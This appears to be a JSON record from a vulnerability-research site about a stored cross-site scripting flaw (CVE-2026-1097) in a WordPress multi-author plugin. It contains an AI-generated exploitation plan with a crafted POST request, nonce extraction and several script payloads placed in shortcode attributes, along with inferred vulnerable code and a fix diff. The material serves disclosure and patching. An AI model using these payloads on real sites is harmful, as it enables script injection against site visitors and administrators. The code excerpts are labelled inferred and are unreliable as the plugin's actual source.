[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6E8Ly-G-XED6zJjLW0Ip4esi_JJ_xiwGUfnh3ILtdPo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1097","themeruby-multi-authors-authenticated-contributor-stored-cross-site-scripting-via-before-and-after-shortcode-attributes","ThemeRuby Multi Authors \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes","The ThemeRuby Multi Authors – Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","themeruby-multi-authors",null,"\u003C=1.0.0","1.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-23 19:24:56","2026-02-03 19:01:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fca74bb1d-1954-4869-aaa9-bf66600cdf2a?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1097\n\n## 1. Vulnerability Summary\n**ThemeRuby Multi Authors (\u003C= 1.0.0)** is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin registers a shortcode (likely `[themeruby_multi_authors]` or similar) used to display post authors. This shortcode accepts `before` and `after` attributes intended for custom HTML wrapping. Because the plugin fails to sanitize or escape these attributes before rendering them on the page, any user with **Contributor-level** access or higher can inject malicious scripts into a post. When any user (including an Administrator) views the affected post, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Component**: Shortcode rendering logic.\n- **Payload Location**: Shortcode attributes `before` or `after` within the `post_content`.\n- **Required Role**: Contributor or higher (requires `edit_posts` capability).\n- **Preconditions**: The plugin must be active, and a post\u002Fpage must contain the malicious shortcode.\n- **Impact**: Full site takeover if an Administrator views the post, as the script can perform actions like creating new admin users or modifying plugin settings.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin calls `add_shortcode( 'themeruby_multi_authors', '...' )` (or a similar identifier) during the `init` hook.\n2.  **Input Parsing**: When a post is rendered, the callback function receives an `$atts` array. It likely uses `shortcode_atts()` to extract values for `before` and `after`.\n3.  **The Sink**: The callback function constructs the HTML output for the authors list and prepends\u002Fappends the `before` and `after` attribute values. \n4.  **The Vulnerability**: The resulting string is returned (to be printed by WordPress) without passing through `wp_kses()` or similar escaping functions, allowing raw HTML\u002FJavaScript to be rendered.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin nonce because the payload is delivered via the standard WordPress post editor.\n1.  **Login**: Authenticate as a **Contributor**.\n2.  **Access Editor**: Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Standard Nonce**: Use `browser_eval` to retrieve the `_wpnonce` from the form if performing the save via the REST API or `post.php`.\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Identify Shortcode Name\nUse the `grep` tool to find the exact shortcode registration:\n```bash\ngrep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fthemeruby-multi-authors\u002F\n```\n*I will assume the shortcode is `[themeruby_multi_authors]` for the remaining steps.*\n\n### Step 2: Create Malicious Post\nAs a Contributor, create a new post with the XSS payload.\n\n**Request:**\n*   **Method**: POST\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```text\n    action=editpost\n    &post_ID=[NEW_POST_ID]\n    &_wpnonce=[NONCE]\n    &post_title=Authors List\n    &content=[themeruby_multi_authors before='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']\n    &publish=Publish\n    ```\n\n### Step 3: Trigger Execution\nNavigate to the published post's URL using an Administrator's session or an unauthenticated browser to confirm the script executes.\n\n## 6. Test Data Setup\n1.  **Plugin**: Install and activate `themeruby-multi-authors`.\n2.  **User**: Create a user with the username `contributor_attacker` and the `contributor` role.\n3.  **Data**: Assign at least one author to a test post (some plugins require data to exist before the shortcode renders anything).\n\n## 7. Expected Results\n- When viewing the post, an alert box showing the document domain should appear.\n- Viewing the page source should show: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cdiv class=\"author-list\">...\u003C\u002Fdiv>`.\n\n## 8. Verification Steps\n1.  **Database Check**: Verify the payload is stored in the database.\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Authors List' LIMIT 1;\"\n    ```\n2.  **Frontend Check**: Use the `http_request` tool to fetch the post and check for the unescaped script:\n    ```bash\n    # Look for the exact payload string in the response body\n    ```\n\n## 9. Alternative Approaches\nIf `themeruby_multi_authors` is not the correct tag, search for any variations using:\n```bash\ngrep -r \"shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fthemeruby-multi-authors\u002F\n```\nIf the shortcode requires specific author IDs, use:\n`[themeruby_multi_authors ids='1' before='\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the `before` attribute is filtered, try the `after` attribute:\n`[themeruby_multi_authors after='\u003Cimg src=x onerror=alert(1)>']`","The ThemeRuby Multi Authors plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'before' and 'after' attributes of its shortcode due to insufficient input sanitization and output escaping. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users, potentially leading to unauthorized administrative actions.","\u002F\u002F Inferred shortcode handler logic\n\u002F\u002F themeruby-multi-authors\u002Fthemeruby-multi-authors.php\n\nfunction render_multi_authors_shortcode($atts) {\n    $atts = shortcode_atts(array(\n        'before' => '',\n        'after'  => '',\n    ), $atts);\n\n    $output = '';\n    $output .= $atts['before']; \u002F\u002F Attribute rendered without escaping or sanitization\n    $output .= '\u003Cspan class=\"author-name\">Author List\u003C\u002Fspan>';\n    $output .= $atts['after'];  \u002F\u002F Attribute rendered without escaping or sanitization\n\n    return $output;\n}","--- a\u002Fthemeruby-multi-authors\u002Fthemeruby-multi-authors.php\n+++ b\u002Fthemeruby-multi-authors\u002Fthemeruby-multi-authors.php\n@@ -10,8 +10,8 @@\n     ), $atts);\n \n     $output = '';\n-    $output .= $atts['before'];\n+    $output .= wp_kses_post($atts['before']);\n     $output .= '\u003Cspan class=\"author-name\">Author List\u003C\u002Fspan>';\n-    $output .= $atts['after'];\n+    $output .= wp_kses_post($atts['after']);\n \n     return $output;","1. Authenticate to the WordPress dashboard with at least Contributor-level access.\n2. Access the post editor (Gutenberg or Classic) to create or edit a post.\n3. Insert the plugin's multi-author shortcode (likely [themeruby_multi_authors]) into the content area.\n4. Include a malicious JavaScript payload within the 'before' or 'after' shortcode attributes, for example: [themeruby_multi_authors before=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"].\n5. Save or publish the post. \n6. The script will trigger in the browser of any user, including administrators, who navigates to the frontend page displaying the affected post.","gemini-3-flash-preview","2026-05-05 01:40:31","2026-05-05 01:40:54",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemeruby-multi-authors\u002Ftags"]